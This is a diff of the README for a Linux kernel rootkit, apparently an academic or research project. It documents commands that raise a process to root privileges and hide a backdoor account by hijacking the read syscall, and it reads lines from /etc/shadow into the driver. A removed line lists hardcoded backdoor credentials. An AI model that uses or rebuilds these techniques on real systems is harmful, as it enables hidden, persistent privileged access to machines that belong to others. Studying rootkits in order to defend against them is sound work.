bvalarezo/rootkit/README.md

 ### Example
 Escalating a process with a PID 12345

-    ./driver elevate 12345
+    $ ./driver elevate 12345
 Dropping the escalated process back to its original UID

-    ./driver drop 12345
+    $ ./driver drop 12345

 >**Note:** You may only drop processes you have escalated before.

 ## Backdoor Account
-When the rootkit is first loaded, it adds backdoor account into /etc/passwd and /etc/shadow if the account doesn't exist already.
-It also hides backdoor account while the rootkit is loaded by hijacking write syscall and change the output buffer.
+**PLEASE NOTE: at most, 1 account can be hidden at a time** The rootkit hides a backdoor account by hijacking the read syscall and truncating parts of the output buffer.

-### Backdoor account info
-> Username = fugitive

-> Password = Password123
+### Hiding an Account
+Pass 1 line from "/etc/passwd" along with another from "/etc/shadow" into the driver:

+    $ ./driver fugitive `cat /etc/passwd | grep MY_USERNAME` `sudo cat /etc/shadow | grep MY_USERNAME`

+Makign those lines visible again is as simple as:

+    $ ./driver unfugitive

 ## Using the System Call Table Modifier (`sctm`)
 `sctm` is partially object-oriented (in that all operations occur on a `struct sctm *`);